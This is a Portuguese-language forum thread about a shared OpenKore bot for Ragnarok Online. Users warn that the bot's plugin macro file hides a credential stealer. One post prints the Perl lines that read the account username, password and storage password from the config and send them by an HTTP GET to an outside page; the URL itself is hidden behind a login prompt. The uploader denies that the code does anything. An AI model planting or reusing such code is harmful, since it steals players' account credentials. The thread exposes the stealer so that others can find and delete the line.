Ir para conteúdo
🥇 [Exclusivo] Seja um Membro VIP EXTREME! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

Posts Recomendados

[ Obrigado ]

Por Hackear minha conta !!!

E criar um char falando q 1 amigo meu passo a senha sendo que NIGUEM sabe né rsrsrsrs

mas tae baixa o bot desse mlk te dou a certeza que vai ter o mesmo futuro q o meu , e cara você é ridiculo, pode conseguir meu itens agora mas acredite depois você se da mal ! (: e vai ser muito mas caro q os meus vai nessa ae te da mtu ( FUTURO ) . -LIXOFDPARROMBADO.

pessoal quem for baixando vão me agradecendo,porque muita jente baixo e poucos agradecerão

Susanno eu adicionei seu bot na minha quick list mas como não confiavel, pois possiu keylogger na pasta pluing,aquivo macro. como eu já citei na minha quick list- http://www.webcheats.com.br/forum/rag-cheats/983122-quick-list-bots-confiaveis-e-bots-nao-confiaveis.html

e na primeira e quarta pagina^^

QUEM BAIXAR VAI SER HACKIADO :)

esse arquivo está inofencivo e sem destino eu mesmo to usando ele e nd me occoreu,por isso postei ele aqui porque não aconteceu nd com migo e testei ele de todas as formas e não foi nada furtado meu

para nós que baixamos esse endereço não vai a lugar nenhum mas para você vai para uma página php que grava usuarios e senhas de quem executar o bot

eu entendo disso então não venha querer me enganar^^

quem baixar irá ser hackiado é meu ultimo aviso!

Nem me agradece por ter achado a linha neh =)

Procurarei uma forma de encontrar essas linhas mais facilmente, quando achar postarei no forum ^^

Engraçado que o cara se faz de santinho. Naum sei se a maioria das contas que postaram aqui são fakes, mas fica o aviso pra quem não é fake.

O bot está com uma linha de comando que manda sua senha para um site de armazenamento(para quem fica falando que é KL não é, se fosse KL seria virus) por ser um envio não é considerador virus.

Como o frde disse, quem baixar sera hackiado.

SIM, SE NÓS TENTARMOS ACESSAR ESSA PÁGINA NÃO IRÁ DAR NADA, MAS QUANDO ELE ENTRAR IRÁ FUNCIONAR POIS O IP DELE É O UNICO QUE FUNCIONA POIS ELE FEZ O HACK.

ESSA PÁGINA SE TRATA DA FAMOSA "PAGINA PEGA SENHA" OU SE PREFERIREM "PAGINA PHP" ELA GRAVA OS ARQUIVOS MANDADOS PARA ELE NO MOMENTO EM QUE ABRIMOS O KORE

MAIS TARDE ELE VAI POSTAR AQUI QUE É MENTIRA, ELE PODE ENGANAR QUEM ELE QUISER MAS A MIM NÃO, EU SEI DESSAS PARADAS SEI MEXER NISSO, TANTO QUE FIZ ESSA QUICK LIST- http://www.webcheats.com.br/forum/rag-cheats/983122-quick-list-bots-confiaveis-e-bots-nao-confiaveis.html

AGRADECIDA MAIS DE 11 VEZES, E POSSO AFIRMAR COM TODA A CERTEZA QUEM BAIXAR IRÁ SER MAIS UMA VÍTIMA.

BOM DEPOIS DESSE DISCURSO QUE EU DEI NÃO PRECISO FALAR MAIS NADA NÉ.

@masachetti

fui eu o primeiro a achar ¬¬

@Suzanoo Sasuke

não se faça de bobo,

tem o KL la sim,

mal intencionado ou não,

inclusive te reportei,

pq se vc por acaso não soubesse que o KL estava la(que acho muito dificil) poderia ter editado,

agora é esperar providencias.

alguem ae pode me postar a linha do sender?

Eu gostaria de saber '-', pois assim eu prevenia de ser hacked não só nesse openkore como em varios outros, postem ae as linhas pff .-.!

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

ESTA NA PASTA PLUING, ABRA O ARQUIVO MACRO COM O BLOCO DE NOTAS E LOCALIZE ESSE CODIGO ACIMA!

CARO SUSANNO REALMENTE O BOT ESTÁ FUNCIONAL MAS O PREJUÍZO VEM DEPOIS^^

use Utils qw(urlencode);

$ua->timeout(10);

$ua->env_proxy;

$senha $kafra");

ESTA NA PASTA PLUING, ABRA O ARQUIVO MACRO COM O BLOCO DE NOTAS E LOCALIZE ESSE CODIGO ACIMA!

Custa ensinar como nao desviar a senha e o login para o hacker??

PESSOAL BASTA APAGAR O ".com" pois o link citado acima é o que o seu pc vai direcionar seu usuario e sua senha, entao apos remover o ".com" o link citado na linha vai passar a ser inexistente e nao enviará nada, ou se voce simplesmente achar que ele poderá mudar o dominio e retirar o .com do site dele para continuar pegando otarios, APAGA A LINHA TODA FILHO DA PUTA.

gente não tem comando algum nisso,é apenas um link sem destino

muda a senha enquanto há tempo vacilão, não é kl mas é redirecionamento de texto, e pena que esse texto é sua senha seu login e sua senha kafra. ^^

Frde, geralmente esse redirecionamento vem no macro.pl?

use Utils qw(urlencode);

$ua->timeout(10);

$ua->env_proxy;

$senha $kafra");

Achei O.o, cara safadiiiinhooo huehuehue, o bom de voce ter postado isso é que voce está ensinando as pessoas a "abrir os olhos" e tomar mais cuidado, vlw mesmo kra vc salvou meu arcano S2 :D

jente,essa linha ae não tem nd,apenas um link sem destino eu mesmo testei ele!

Pode me ajudar por favor ?

eu faço tudo certinho , dps q logo a conta q tem a aprendiz e a criadora , vo la na pasta do openkore , e clico na opçao : OPNKORE , blz abre la aquela janela começa a caregar so q tem uma hora q aparece : ERRO DA SENHA .

e fala q n ta conectado !!!

POR FAVOR ME AJUDA AI MANOW .

jente,essa linha ae não tem nd,apenas um link sem destino eu mesmo testei ele!

Cara, das duas uma, ou você é o hacker ( aff nao sei pra q uso hacker) ou voce foi atingido, a dica eu dei faz o que voce quiser.

Este tópico está impedido de receber novos posts.
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.